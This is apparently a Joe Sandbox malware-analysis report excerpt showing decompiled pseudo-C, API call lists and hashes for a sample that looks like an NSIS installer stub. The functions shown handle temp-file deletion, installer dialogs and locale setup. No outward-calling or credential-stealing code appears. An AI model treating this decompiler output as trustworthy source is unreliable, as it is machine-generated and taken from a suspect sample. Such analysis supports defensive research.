0x00000000
0x00405ce1
0x00405ce1
0x00405ce1
0x00405ce9
0x00405d09
0x00405d11
0x00405d16
0x00405d1d
0x00405d38
0x00405d3d
0x00405d3f
0x00405d63
0x00405d41
0x00405d41
0x00405d44
0x00405d58
0x00405d46
0x00405d49
0x00405d51
0x00405d51
0x00405d44
0x00405d1f
0x00405d25
0x00405d27
0x00405d2d
0x00405d2d
0x00405d27
0x00000000
0x00405d1d
0x00405ceb
0x00405cf3
0x00000000
0x00000000
0x00405cf5
0x00405cfd
0x00000000
0x00000000
0x00405cff
0x00405d07
0x00000000
0x00000000
0x00000000
0x00405d68
0x00405d70
0x00405d76
0x00405d76
0x00405d7f
0x00000000
0x00405d7f
0x00405caa
0x00405cb2
0x00000000
0x00000000
0x00000000
0x00405c6e
0x00405c6e
0x00405c70
0x00405d90
0x00405d92
0x00405d95
0x00405de6
0x00405de6
0x00405de6
0x00405d97
0x00405d9a
0x00405da5
0x00405daa
0x00405dac
0x00000000
0x00000000
0x00405daf
0x00405dbb
0x00405dc0
0x00405dc2
0x00000000
0x00405ddd
0x00405dc4
0x00405dc7
0x00000000
0x00000000
0x00405dcc
0x00000000
0x00405dd3
0x00405d9c
0x00405d9c
0x00000000
0x00405d9c
0x00405c76
0x00405c79
0x00000000
0x00000000
0x00000000
0x00405c79

APIs

DeleteFileW.KERNELBASE(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C4F
lstrcatW.KERNEL32(007A3F50,\*.*), ref: 00405C97
lstrcatW.KERNEL32(?,0040A014), ref: 00405CBA
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CC0
FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CD0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D70
FindClose.KERNEL32(00000000), ref: 00405D7F

Strings

P?z, xrefs: 00405C7F
\*.*, xrefs: 00405C91
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C33
., xrefs: 00405CE1
., xrefs: 00405CF5

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
API String ID: 2035342205-1425114641
Opcode ID: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
Opcode Fuzzy Hash: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406850(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4f98); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4f98;
			}

0x0040685b
0x00406864
0x00000000
0x00406871
0x00406867
0x00000000

APIs

FindFirstFileW.KERNELBASE(76F1FAA0,007A4F98,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00405F3A,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040685B
FindClose.KERNEL32(00000000), ref: 00406867

Strings

C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp, xrefs: 00406850

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp
API String ID: 2295610775-326868885
Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403F77 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00403F77(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f30 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8a68 = _t127;
						 *0x7a1f44 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff10 = _t91;
						E00404476(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a48); // executed
						 *0x7a7a2c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f30 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8a80;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044C2(0x40b);
						while(1) {
							_t36 =  *0x7a1f30;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x7a8a84;
							if(_t38 ==  *0x7a8a84) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a2c - _t136;
							if( *0x7a7a2c != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x7a8a84; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E00406557(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404476(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404476(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404476(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8aec - _t136;
							_v28 = _t48;
							if( *0x7a8aec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E00404498(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff10, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8aec - _t136;
							if( *0x7a8aec == _t136) {
								_push( *0x7a1f44);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff10);
							}
							E004044AB();
							E0040651A(0x7a1f48, E00403F58());
							E00406557(0x7a1f48, _t127, _t133,  &(0x7a1f48[lstrlenW(0x7a1f48)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f48); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a38); // executed
									 *0x7a0f20 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8a60,  *_t133 +  *0x7a7a40 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "5F@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x7a7a38 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404476(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a38, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x7a7a2c - _t136;
									if( *0x7a7a2c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a38, 8); // executed
									E004044C2(0x405);
									goto L60;
								}
								__eflags =  *0x7a8aec - _t136;
								if( *0x7a8aec != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8ae0 - _t136;
								if( *0x7a8ae0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a38);
						 *0x7a8a68 = _t136;
						EndDialog(_t127,  *0x7a0718);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a38, 0x40f, 0, 1);
						__eflags =  *0x7a7a2c;
						return 0 |  *0x7a7a2c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f28, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a38, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8aec - _t136;
											if( *0x7a8aec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0718 = 1;
												L23:
												_push(0x78);
												L24:
												E0040444F();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0718 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a38);
						 *0x7a7a38 = _t122;
						L60:
						if( *0x7a3f48 == _t136 &&  *0x7a7a38 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x7a3f48 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f28,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E004044DD(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x00403f82
0x00403f89
0x004040f0
0x004040f4
0x004040f8
0x004040fa
0x004040ff
0x0040410a
0x00404115
0x0040411a
0x0040411c
0x0040411e
0x00404121
0x00404126
0x00404134
0x00404141
0x00404148
0x00404148
0x00404149
0x00404149
0x0040414e
0x00404154
0x0040415b
0x00404161
0x00404163
0x004041a3
0x004041a8
0x004041ad
0x004041ad
0x004041b2
0x004041bb
0x004041bd
0x004041c2
0x004041c8
0x004041cc
0x004041cc
0x004041d1
0x004041d7
0x00000000
0x00000000
0x004041e2
0x004041e8
0x00000000
0x00000000
0x004041f1
0x004041f9
0x004041fe
0x00404201
0x00404207
0x0040420c
0x0040420f
0x00404215
0x0040421a
0x0040421d
0x00404223
0x0040422b
0x00404231
0x00404237
0x0040423b
0x00404242
0x00404242
0x00404242
0x0040424c
0x0040425e
0x0040426a
0x0040426f
0x00404279
0x0040427f
0x00404281
0x00404286
0x00404283
0x00404283
0x00404283
0x00404296
0x004042ae
0x004042b0
0x004042b6
0x004042cb
0x004042b8
0x004042c1
0x004042c3
0x004042c3
0x004042d1
0x004042e2
0x004042f8
0x004042ff
0x00404309
0x0040430e
0x00404310
0x00000000
0x00404316
0x00404316
0x00404318
0x00000000
0x00000000
0x0040431e
0x00404322
0x00404347
0x0040434d
0x00404353
0x00404355
0x00000000
0x00000000
0x0040437b
0x00404381
0x00404383
0x00404388
0x00000000
0x00000000
0x0040438e
0x00404391
0x00404394
0x004043ab
0x004043b7
0x004043d0
0x004043da
0x004043df
0x004043e5
0x00000000
0x00000000
0x004043ef
0x004043fa
0x00000000
0x004043fa
0x00404324
0x0040432a
0x00000000
0x00000000
0x00404330
0x00404336
0x00000000
0x00000000
0x00000000
0x0040433c
0x00404310
0x00404407
0x00404413
0x0040441a
0x00000000
0x00404165
0x00404165
0x00404168
0x0040419b
0x0040419b
0x0040419d
0x00000000
0x00000000
0x00000000
0x0040419d
0x0040416e
0x00404173
0x00404175
0x00000000
0x00000000
0x00404185
0x0040418d
0x00000000
0x00404193
0x00403f9b
0x00403f9b
0x00403f9f
0x00403fa4
0x00403fb3
0x00403fb3
0x00403fb9
0x00403fc0
0x00404004
0x0040400a
0x00404023
0x00404026
0x00404039
0x0040403f
0x00000000
0x00000000
0x00404045
0x00404050
0x00404052
0x00404054
0x00404073
0x00404073
0x00404076
0x0040407b
0x0040407e
0x0040408e
0x0040408f
0x00404091
0x004040c7
0x004040d7
0x00000000
0x004040d7
0x00404093
0x00404099
0x004040b2
0x004040b7
0x004040b9
0x00000000
0x00000000
0x004040bb
0x004040a7
0x004040a7
0x004040a9
0x004040a9
0x00000000
0x004040a9
0x0040409c
0x004040a1
0x00000000
0x004040a1
0x00404080
0x00404086
0x00000000
0x00000000
0x00404088
0x00000000
0x00404088
0x00404078
0x00000000
0x00404078
0x0040405e
0x00404065
0x0040406b
0x0040406d
0x00404443
0x00000000
0x00404443
0x00000000
0x0040406d
0x0040402b
0x00000000
0x00404033
0x00404012
0x00404018
0x00404420
0x00404426
0x00404433
0x00404439
0x00404439
0x00000000
0x00403fc2
0x00403fc7
0x00403fd3
0x00403fdc
0x004040dd
0x00000000
0x00403ffb
0x00403ffe
0x00000000
0x00403ffe
0x00403fdc
0x00403fc0

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
ShowWindow.USER32(?), ref: 00403FD3
GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
ShowWindow.USER32(?,00000004), ref: 00403FFE
DestroyWindow.USER32 ref: 00404012
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040402B
GetDlgItem.USER32 ref: 0040404A
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
IsWindowEnabled.USER32(00000000), ref: 00404065
GetDlgItem.USER32 ref: 00404110
GetDlgItem.USER32 ref: 0040411A
KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404134
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
GetDlgItem.USER32 ref: 0040422B
ShowWindow.USER32(00000000,?), ref: 0040424C
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040425E
EnableWindow.USER32(?,?), ref: 00404279
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040428F
EnableMenuItem.USER32 ref: 00404296
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
SetWindowTextW.USER32(?,007A1F48), ref: 004042FF
ShowWindow.USER32(?,0000000A), ref: 00404433

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
String ID:
API String ID: 3618520773-0
Opcode ID: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
Opcode Fuzzy Hash: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BC9 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BC9(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8a70;
				_t22 = E004068E7(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f48;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E004063E8(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f48, 0);
					__eflags =  *0x7a1f48;
					if(__eflags == 0) {
						E004063E8(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f48, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406461(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403E9F(_t78, _t90);
				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x7a8ae0 =  *0x7a8a78 & 0x00000020;
				 *0x7a8afc = 0x10000;
				if(E00405EF1(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405EF1(_t98, _t86) == 0) {
						E00406557(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8a60, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a7a48 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403E9F(_t78, __eflags);
							__eflags =  *0x7a8b00;
							if( *0x7a8b00 != 0) {
								_t33 = E0040564F(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a2c;
								if( *0x7a7a2c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f28, 5); // executed
							_t39 = E00406877("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406877("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a00);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a00);
								 *0x7a7a24 = _t87;
								RegisterClassW(0x7a7a00);
							}
							_t44 = DialogBoxParamW( *0x7a8a60,  *0x7a7a40 + 0x00000069 & 0x0000ffff, 0, E00403F77, 0); // executed
							E00403B19(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8a60;
						 *0x7a7a04 = E00401000;
						 *0x7a7a10 =  *0x7a8a60;
						 *0x7a7a14 = _t30;
						 *0x7a7a24 = 0x40a380;
						if(RegisterClassW(0x7a7a00) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f28 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a60, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a00;
					E004063E8(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a98 + _t78 * 2,  *0x7a8a98 +  *(_t82 + 0x4c) * 2, 0x7a6a00, 0);
					_t63 =  *0x7a6a00; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a02;
						 *((short*)(E00405E16(0x7a6a02, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040651A(_t86, E00405DE9(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E35(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bcf
0x00403bd8
0x00403bdf
0x00403be1
0x00403bf5
0x00403c07
0x00403c10
0x00403c19
0x00403c20
0x00403c25
0x00403c2c
0x00403c3f
0x00403c3f
0x00403c4a
0x00403be3
0x00403bee
0x00403bee
0x00403c4f
0x00403c59
0x00403c62
0x00403c67
0x00403c78
0x00403d0a
0x00403d12
0x00403d1b
0x00403d1b
0x00403d31
0x00403d37
0x00403d45
0x00403dc6
0x00403dce
0x00403dd8
0x00403ddd
0x00403de3
0x00403e6d
0x00403e72
0x00403e74
0x00403e90
0x00000000
0x00403e90
0x00403e76
0x00403e7c
0x00403e84
0x00403e84
0x00000000
0x00403e7c
0x00403df1
0x00403dfc
0x00403e01
0x00403e03
0x00403e0a
0x00403e0a
0x00403e15
0x00403e1d
0x00403e1f
0x00403e21
0x00403e2a
0x00403e2d
0x00403e33
0x00403e33
0x00403e52
0x00403e63
0x00000000
0x00403e68
0x00403dd0
0x00403dd2
0x00000000
0x00403d47
0x00403d47
0x00403d53
0x00403d5d
0x00403d63
0x00403d68
0x00403d77
0x00403e95
0x00403e95
0x00000000
0x00403e95
0x00403d86
0x00403dc1
0x00000000
0x00403dc1
0x00403c7e
0x00403c7e
0x00403c81
0x00403c83
0x00000000
0x00000000
0x00403c91
0x00403ca3
0x00403ca8
0x00403cb1
0x00000000
0x00000000
0x00403cb7
0x00403cb9
0x00403cc6
0x00403cc6
0x00403ccf
0x00403cd5
0x00403cfd
0x00403d05
0x00000000
0x00403ce7
0x00403ce8
0x00403cf1
0x00403cf7
0x00403cf8
0x00000000
0x00403cf8
0x00403cf3
0x00403cf5
0x00000000
0x00000000
0x00000000
0x00403cf5
0x00403cd5

APIs

Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914

lstrcatW.KERNEL32(1033,007A1F48), ref: 00403C4A
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F1FAA0), ref: 00403CCA
